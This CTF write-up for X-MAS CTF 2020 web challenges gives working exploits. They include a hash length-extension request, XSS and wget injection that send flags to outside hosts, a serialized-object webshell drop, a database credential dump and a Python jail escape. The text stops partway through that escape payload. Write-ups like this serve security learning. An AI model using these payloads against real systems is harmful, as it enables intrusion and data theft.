X-MAS CTF 2020

cat_clicker

We need at least 13 cats to buy the flag, but the game never lets us have more than 12. The state variable that holds the cat count is also checked against a hash, so it cannot simply be edited.

state: 12 | 0
hash: cf13ab76afb625f7f7d6c539c2cb3c84

...

state: 12 | 12
hash: 9579729592f72a075bb61f63b8ea238e

There is also a .git directory under the web root so we can dump all the committed source code.

<?php

function hashFor($state) {
    // Tag for a client-held state string: MD5 over "<secret> | <state>".
    // NOTE(review): this is a secret-prefix hash, not a MAC. MD5 is a
    // Merkle-Damgard hash, so a tag for one message can be extended to a tag
    // for that message plus padding plus a suffix without knowing the secret.
    // hash_hmac('sha256', $state, $secret) does not have this weakness.
    $key = getenv("SECRET_THINGY"); // 64 random characters - impossible to guess
    return md5($key . " | " . $state);
}


function verifyState($state, $hash) {
    // True only when $hash is exactly the string hashFor() produces for $state.
    // NOTE(review): === on strings is not a constant-time comparison;
    // hash_equals() is the usual choice when comparing authentication tags.
    $expected = hashFor($state);
    return $hash === $expected;
}


function getCatsNo($state) {
    // Cat count = integer value of the LAST " | "-separated field of the state.
    // NOTE(review): the number of fields is never checked, so a state carrying
    // extra trailing fields is parsed without complaint and the final field
    // wins. Rejecting anything that is not exactly two numeric fields would
    // make the parser agree with the format the server itself emits.
    $fields = explode(" | ", $state);
    $last = $fields[count($fields) - 1];
    return intval($last);
}


function getParentsLimit($state) {
    // Parents limit = integer value of the FIRST " | "-separated field.
    // intval() keeps only a leading run of digits, so trailing bytes inside
    // the first field are dropped silently rather than rejected.
    $fields = explode(" | ", $state);
    return intval($fields[0]);
}

?>
# /api/buy.php
include('helper.php');

// Purchase endpoint: takes a client-held (state, hash) pair plus an item id,
// checks the hash, applies the item's cat cost/threshold and answers with a
// freshly signed state as JSON.
$state = $_POST['state'];
$hash = $_POST['hash'];
$itemId = $_POST['item_id'];

// Reject the request when a field is missing, the hash does not match the
// state, or the item id is not "1" or "2".
// NOTE(review): verifyState() as defined in helper.php takes two parameters,
// so the extra `true` passed here has no effect on that function.
// NOTE(review): only the hash over the raw state string is checked; the
// state's shape (exactly two numeric fields) is never validated before
// getCatsNo()/getParentsLimit() parse it below.
if(!isset($state) || !isset($hash) || !isset($itemId) || !verifyState($state, $hash, true) || ($itemId !== "1" && $itemId !== "2")) {
    echo json_encode(array('success' => false));
    die();
}

$cats = getCatsNo($state);
$item = "";
$ok = true;

if($itemId === "1") {
    // Item 1 costs one cat and yields the decoy flag.
    if($cats >= 1) {
        $cats -= 1;
        $item = "FAKE-X-MAS{fake-flag-dont-submit-signed-yakuhito}";
    } else {
        $ok = false;
    }
} else {
    // Item 2 needs at least 13 cats; on success the count is set to 1337 and
    // the item is the FLAG environment variable.
    if($cats >= 13) {
        $cats = 1337;
        $item = getenv("FLAG");
    } else {
        $ok = false;
    }
}
// The new state is rebuilt from the two parsed integers and signed again, so
// whatever else the submitted state string contained is not carried over.
$parentsLimit = getParentsLimit($state);
$newState = "$parentsLimit | $cats";
$newHash = hashFor($newState);

// The re-signed state is only returned on success.
if($ok === true) {
    echo json_encode(array('state' => $newState, 'hash' => $newHash, 'success' => $ok, 'item' => $item));
} else {
    echo json_encode(array('success' => false));
}

?>

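The hash is produced by hashFor as the MD5 of a 64-byte random secret followed by the state, and the hash parameter is checked by verifyState. getCatsNo explodes the state on " | " and returns the last element of the array via end(). Because md5(secret + data) is open to a length extension attack, we can append our own suffix to a signed state and still present a valid hash, and the appended last field is then read as the cat count. An HMAC over the state, together with rejecting states that do not have exactly two fields, would have prevented this.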

fetch('/api/buy.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'item_id=2&state=12%20%7C%201%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00H%02%00%00%00%00%00%00%20%7C%20777&hash=dfbd80d86042f767d4cbdc38015e2d5a'
}).then((x) => x.text()).then((x) => console.log(x));
/*
{"state":"12 | 1337","hash":"52586134e945c681089af25c36a1866f","success":true,"item":"X-MAS{1_h4v3_s0_m4ny_c4t5_th4t_my_h0m3_c4n_b3_c0ns1d3r3d_4_c4t_sh3lt3r_aaf30fcb4319effa}"}
*/
X-MAS{1_h4v3_s0_m4ny_c4t5_th4t_my_h0m3_c4n_b3_c0ns1d3r3d_4_c4t_sh3lt3r_aaf30fcb4319effa}

Comfort Bot

engine.getCleverResponse is called whenever a message starts with `!`.

# bot.py
	elif (message.content.startswith ("!")):
		spell = True
		response = await engine.getCleverResponse (authorID, message.content[1:])

That function in turn calls cleverDriver.getCleverResponse.

async def getCleverResponse (authorID, message):
	"""Return a reply to *message*.

	Author id 0 gets a randomly chosen canned phrase; every other author gets
	the result of cleverDriver.getCleverResponse passed through parseUsers.
	"""
	if (authorID != 0):
		driverReply = cleverDriver.getCleverResponse (authorID, message)
		return await parseUsers (driverReply)

	cannedReplies = [
		"Oh, I quite certainly agree.",
		"There, there, it's alright.",
		"Oh!",
		"Fascinating!",
		"Exquisite reply!",
		"Running program: COMFORT.",
		"Understandable.",
		"Hmm.",
		"I see.",
		"Well, if you really think that...",
		"What are you doing?",
		"What are you up to?",
		"What's that?",
		"[Nodding]",
		"[Nodding and stroking chin saying mhmm]",
	]
	return random.choice (cannedReplies)

It runs in headless Chrome, and because we control the txt variable, which is formatted straight into the script string, we can inject JavaScript (XSS).

async def getCleverResponse (authorID, txt):
	"""Send *txt* to the cleverbot page in a fresh browser tab and return its reply.

	Opens http://localhost/ in a new window, records that window handle under
	windows[authorID], calls cleverbot.sendAI with the text, polls
	cleverbot.aistate every 0.4 s until it is 0, then reads cleverbot.reply,
	closes the tab and switches back to the first window.

	On any exception the driver is recreated via CreateCleverDriver() and the
	function falls through, returning None.
	"""
	global driver

	try:
		driver.execute_script("window.open('http://localhost/','_blank');")
		# The newest handle is taken to be the tab that was just opened.
		windows[authorID] = driver.window_handles[-1]
		switchToAuthorWindow(authorID)
		
		# NOTE(review): txt is interpolated into JavaScript source with no
		# escaping, so a quote character in txt ends the string literal and
		# the remainder executes as script in the page at http://localhost/.
		# Passing the text as a script argument keeps it data:
		#   driver.execute_script("cleverbot.sendAI(arguments[0])", txt)
		script = "cleverbot.sendAI('{0}')".format (txt)
		driver.execute_script (script)
		# Poll until the page reports the AI request has finished (aistate == 0),
		# re-selecting this author's window after each sleep.
		while (driver.execute_script ("return cleverbot.aistate") != 0):
			await asyncio.sleep (0.4)
			switchToAuthorWindow(authorID)

		reply = driver.execute_script ("return cleverbot.reply")
		switchToAuthorWindow(authorID)
		driver.execute_script("window.close()")
		driver.switch_to_window(driver.window_handles[0])
		return reply
	# NOTE(review): a bare except hides every failure, including script errors
	# caused by malformed input; nothing is logged before the driver is rebuilt.
	except:
		CreateCleverDriver ()
!03sunf');fetch('/flag').then(x=>x.text()).then(x=>fetch('//cve.kr?flag='+x));('
149.28.40.196 - - [13/Dec/2020:09:36:24 +0000] "GET /?flag=**X-MAS{0h_J1nk135!!!Why_w0uld_y0u_br34k_our_commun4l_b07???125184ae}** HTTP/1.1" 777 52 "http://localhost/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/83.0.4103.116 Safari/537.36"
X-MAS{0h_J1nk135!!!Why_w0uld_y0u_br34k_our_commun4l_b07???125184ae}

flag_checker

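Only characters that occur in $example_flag are allowed, and checkFlag compares case-insensitively (both sides are lowercased). The characters `$`, `{`, `}`, `-` and the letters of IFS are all in that set, so we can use ${IFS} as a separator to add options to the wget command.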

<?php
/* flag_checker */
include('flag.php');

// Without a ?flag= parameter the script prints its own source and stops.
if (isset($_GET['flag']) === false) {
    highlight_file(__FILE__);
    exit();
}

function checkFlag($flag) {
    // Character allow-list: every character of $flag, lowercased, must occur
    // somewhere in the lowercased sample flag.
    // NOTE(review): the sample contains `$`, `{`, `}` and `-`, which a shell
    // or a command-line parser treats specially, so passing this check does
    // not make the value safe to place on a command line.
    $allowed = strtolower('FAKE-X-MAS{d1s_i\$_a_SaMpL3_Fl4g_n0t_Th3_c0Rr3c7_one_karen_l1k3s_HuMu5.0123456789}');
    $length = strlen($flag);
    for ($pos = 0; $pos < $length; $pos++) {
        if (strpos($allowed, strtolower($flag[$pos])) === false) {
            return false;
        }
    }
    return true;
}


function getFlag($flag) {
    // Fetch https://kuhi.to/flag/<flag> with wget and report whether any
    // output line came back ('Maybe') or none did ('Nope').
    // NOTE(review): $flag reaches the shell unquoted, so shell expansions and
    // additional wget options inside it are interpreted. escapeshellarg() on
    // the value, or fetching the URL without a shell, keeps it inert data.
    $lines = array();
    exec("wget -q -O - https://kuhi.to/flag/" . $flag, $lines);
    echo (count($lines) == 0) ? 'Nope' : 'Maybe';
}

// Entry point: the request value is screened by checkFlag() only, then handed
// to getFlag(), which builds a shell command from it.
$flag = $_GET['flag'];
if (checkFlag($flag) === false) {
    die('That is not a correct flag!');
}

getFlag($flag);
?>
http://challs.xmas.htsp.ro:3001/?flag=${IFS}--post-file${IFS}flag.php${IFS}-${IFS}03sunF.coM${IFS}
POST / HTTP/1.1
User-Agent: Wget/1.20.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 141.164.53.158
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

<?php
$flag = "X-MAS{s0_fL4g_M4ny_IFS_bb69cd55f5f6}";
?>
X-MAS{s0_fL4g_M4ny_IFS_bb69cd55f5f6}

Gnome's Buttons v4

A guessing challenge. After refreshing the page a few times, a green button appears.

<p><a class="btn btn-success" href="?start=1" role="button">Details anzeigen &raquo;</a></p>

After following the link, a new button appears.

<p><a class="btn btn-success" href="?start=1&role=user&start=1" role="button">View details &raquo;</a></p>

Setting these parameters produces this message.

Het lijkt erop dat je niet de juiste start hebt gehad ... houd daar rekening mee!
# translation -> Looks like you didn't get off to the right start ... keep that in mind!

The start number is easy to brute-force.

from requests import get

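# Try every start value with both roles and report any response whose body
# length is not in the `length` list (presumably the lengths of the already
# known, uninteresting pages).
account = ['user', 'admin']
length  = [5360, 5481, 5641, 5681, 5682, 5683, 5703, 5956, 6002]

for x in range(100000):
    for role in account:
        res = get('http://challs.xmas.htsp.ro:3006/?start={}&role={}'.format(x, role))

        if len(res.text) not in length:
            # The original printed admin[y]; `admin` is never defined, so the
            # first hit raised NameError instead of being reported.
            print(f'FIND NUMBER -> {x}, ROLE -> {role}, LENGTH -> {len(res.text)}')

        else:
            print(f'TRYING {x}\r', end='')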
            
/*
FIND NUMBER -> 1, ROLE -> user, LENGTH -> 5791
FIND NUMBER -> 2020, ROLE -> admin, LENGTH -> 5671
FIND NUMBER -> 2020, ROLE -> user, LENGTH -> 5646
*/

We can see this message when we set params.

NICHT ERLAUBT! Der echte Administrator wird über diesen Vorfall benachrichtigt.
# translation -> NOT ALLOWED! The real administrator will be notified of this incident.

There is also a hidden field in the HTML source.

<p hidden>whitepaper-bhEU2011.pdf</p>

Googling the filename shows that this PDF is about HTTP Parameter Pollution, so we can bypass the check by sending the role parameter twice.

http://challs.xmas.htsp.ro:3006/?start=2020&role=user&role=admin
X-MAS{idontwannafindbugsintheamericanlanguageanymore}

How Brutus stole Christmas

The challenge site looks like a CTF platform hosting two web challenges. This is the code of the first challenge.

<?php

// ?source prints this file's own source and ends the request.
if (isset($_GET['source']) === true) {
    highlight_file(__FILE__);
    exit();
}

class pageContent{
  // Holds the page text and persists it back to disk when the object dies.
  // NOTE(review): __destruct() writes to whatever path $file_name holds. An
  // instance created by unserialize() does not run __construct(), so both
  // properties then come from the serialized data and the write target and
  // content are chosen by whoever supplied that data.
  private $file_name;
  private $newContent;

  // Load the current page text from data/content.txt.
  function __construct()
  {
    $this->file_name = "data/content.txt";
    $this->newContent = file_get_contents($this->file_name);
  }

  // Echoing the object prints the stored content.
  function __toString(){
    return $this->newContent;
  }

  // Replace the stored content; it reaches disk in __destruct().
  function setContent($newContent){
    $this->newContent = $newContent;
  }

  // Overwrite $file_name with $newContent when the object is destroyed.
  function __destruct()
  {
    $handle = fopen($this->file_name, "w");
    fwrite($handle, $this->newContent);
    fclose($handle);
  }
}

function setFooter(){
  // Print the page footer: the default text, or the value decoded from the
  // newFooter request parameter.
  // NOTE(review): unserialize() on request data can instantiate any loaded
  // class, whose magic methods (here pageContent::__destruct) then run with
  // caller-chosen properties. json_decode(), or unserialize() with
  // ['allowed_classes' => false], avoids creating objects from input.
  // The decoded value is also echoed into HTML without escaping.
  if(!isset($_GET['newFooter'])){
    echo '<div class="footer" style="color: white">PWNgyan 2020!</div>';
    return;
  }
  $decoded = base64_decode($_GET["newFooter"]);
  $footer = unserialize($decoded);
  echo '<div class="footer" style="color: white">'.$footer.'</div>';
}

// Render the stored page text, then the footer. $page stays alive until the
// script ends, at which point its destructor rewrites data/content.txt.
$page = new pageContent();
print $page;
setFooter();
?>

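The unserialize() call on the newFooter parameter lets us supply a pageContent object with our own file_name and newContent, and its __destruct() writes that content to disk, so we can write a webshell into the data directory.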

http://challs.xmas.htsp.ro:3050/?newFooter=TzoxMToicGFnZUNvbnRlbnQiOjI6e3M6MjI6IgBwYWdlQ29udGVudABmaWxlX25hbWUiO3M6MTU6ImRhdGEvMDNzdW5mLnBocCI7czoyMzoiAHBhZ2VDb250ZW50AG5ld0NvbnRlbnQiO3M6MTU6Ijw/PWAkX0dFVFt4XWA/PiI7fQ==

We can also confirm that the challenges run on the same server as the platform, so we can access the CTF platform's database with the credentials from its config file.

$ cat /var/www/ctfx/include/config/db.default.inc.php
<?php

/**
 *
 * This file contains default configuration.
 *
 *        DO NOT MAKE CHANGES HERE
 *
 * Copy this file and name it "db.inc.php"
 * before making any changes. Any changes in
 * db.inc.php will override the default
 * config. It is also possible to override
 * configuration options using environment
 * variables. Environment variables override
 * both the default settings and the hard-coded
 * user defined settings.
 *
 */

Config::set('MELLIVORA_CONFIG_DB_ENGINE', 'mysql');
Config::set('MELLIVORA_CONFIG_DB_HOST', 'localhost');
Config::set('MELLIVORA_CONFIG_DB_PORT', 3306);
Config::set('MELLIVORA_CONFIG_DB_NAME', 'mellivora');
Config::set('MELLIVORA_CONFIG_DB_USER', 'mellivora');
Config::set('MELLIVORA_CONFIG_DB_PASSWORD', 'rac9138cn98ascnascud');


$ mysql -D mellivora -u mellivora -prac9138cn98ascnascud -e "select * from challenges;
id	added	added_by	title	category	description	exposed	available_from	available_until	flag	case_insensitive	automark	points	initial_points	minimum_points	solve_decay	solves	num_attempts_allowed	min_seconds_between_submissions	relies_on
1	1606078385	1	Brutus	1	Everyone hates Brutus! But does Brutus hate everyone? Who knows? Or rather, who cares?! What we care about here is the flag. Nothing more.
\n
\nLink: [url]http://challs.xmas.htsp.ro:3050[/url]	1	1584699200	1617235206	pwngyanctf{we_dont_remember_the_actual_flag_:(}	0	1	500	500	50	100	2	0	5	0
2	1606081056	1	Hard Challenge	1	Now it's time for a ramp-up in difficulty. You thought Brutus was hard? Ha! Check this one out then, punk.
\n
\nLink: [url]http://challs.xmas.htsp.ro:3051[/url]	1	1584699200	1617235206	X-MAS{Brutus_why_d1d_y0u_h4v3_t0_h4v3_RCE_113c41afe0}	0	1	500	500	50	100	1	0	5	0
3	1606081136	1	Hello World!	2	Welcome to PWNgyan CTF 2020!
\n
\n[b]pwngyanctf{H3ll0_H4ckerz_3141cc5f}[/b]	1	1584699200	1617235206	pwngyanctf{H3ll0_H4ckerz_3141cc5f}	0	1	10	10	10	1	26	0	5	0
X-MAS{Brutus_why_d1d_y0u_h4v3_t0_h4v3_RCE_113c41afe0}

Krampus's Lair

A Python jail-escape challenge: we can only use the characters abceghimnorstuvw(),/. The important thing is that these still let us call setattr and getattr.

setattr(time, 'bad', ().__class__.__base__.__subclasses__())

setattr(time,min(set(vars())),getattr(getattr(getattr((),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(i
nt,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(in
t,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int)))))))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(s
et(vars(int)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(tim
e,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(geta
ttr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(min(set(min(set(vars(int))))),min(set(min(set(vars(int))))))))())

setattr(time,'bad',time.bad.pop(190))

setattr(time,min(set(vars())),getattr(getattr(time,min(set(vars()))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time)))))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(s